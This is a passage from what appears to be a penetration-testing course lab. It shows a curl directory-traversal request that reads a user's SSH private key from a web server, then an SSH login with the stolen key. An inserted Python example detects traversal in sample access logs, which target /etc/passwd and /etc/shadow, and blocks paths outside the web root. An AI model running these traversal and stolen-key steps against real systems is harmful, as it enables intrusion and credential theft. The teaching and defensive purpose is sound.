curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa
...
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
...
Listing 136 - SSH Private Key via curl

Listing 136 shows that the SSH private key is formatted better using curl than in the browser.
Let's copy the output from the terminal and paste it into a file called dt_key in the home directory for the kali user.
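The request in Listing 136 works because the page parameter is joined to a path without any check that the result stays inside the web root. As an added example (not part of the course material), the following Python code shows the defensive side: a resolver that refuses a page value which escapes an assumed web root of /srv/www/meteor, and a detector that flags such requests, including URL-encoded and double-encoded variants, in constructed Apache-style access log lines.

```python
import os
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines (not taken from the course listing);
# the second request mirrors the page=../../... traversal shown in Listing 136.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2023:10:00:01 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 512
192.0.2.11 - - [10/Oct/2023:10:00:02 +0000] "GET /meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa HTTP/1.1" 200 2602
192.0.2.12 - - [10/Oct/2023:10:00:03 +0000] "GET /meteor/index.php?page=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1024
192.0.2.13 - - [10/Oct/2023:10:00:04 +0000] "GET /meteor/index.php?page=..%252f..%252fetc%252fshadow HTTP/1.1" 404 0
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) ')
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')


def flag_traversal(log_text):
    """Return [(client_ip, decoded_target)] for requests whose target contains a
    dot-dot-slash sequence. The target is URL-decoded twice so that %2f and
    double-encoded %252f variants are caught alongside the literal ../ form."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.group(1), unquote(unquote(m.group(2)))
        if TRAVERSAL_RE.search(target):
            hits.append((ip, target))
    return hits


def safe_include_path(web_root, page):
    """Resolve `page` relative to web_root and return the absolute path, or None
    if the resolved path leaves web_root. realpath() collapses ../ components
    and follows symlinks, so a prefix test on the result is sound. An absolute
    `page` value makes os.path.join() drop web_root, so it is rejected too."""
    root = os.path.realpath(web_root)  # web root is an assumed example value
    candidate = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate
```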
Let's use the private key to connect to the target system via SSH on port 2222. We can use the -i parameter to specify the stolen private key file and -p to specify the port. Before we can use the private key, we'll need to modify the permissions of the dt_key file so that only the user/owner can read the file; if we don't, the ssh program will throw an error stating that the access permissions are too open.
kali@kali:~$ ssh -i dt_key -p 2222 offsec@mountaindesserts.com
The authenticity of host '[mountaindesserts.com]:2222 ([192.168.50.16]:2222)' can't be established.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
...
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@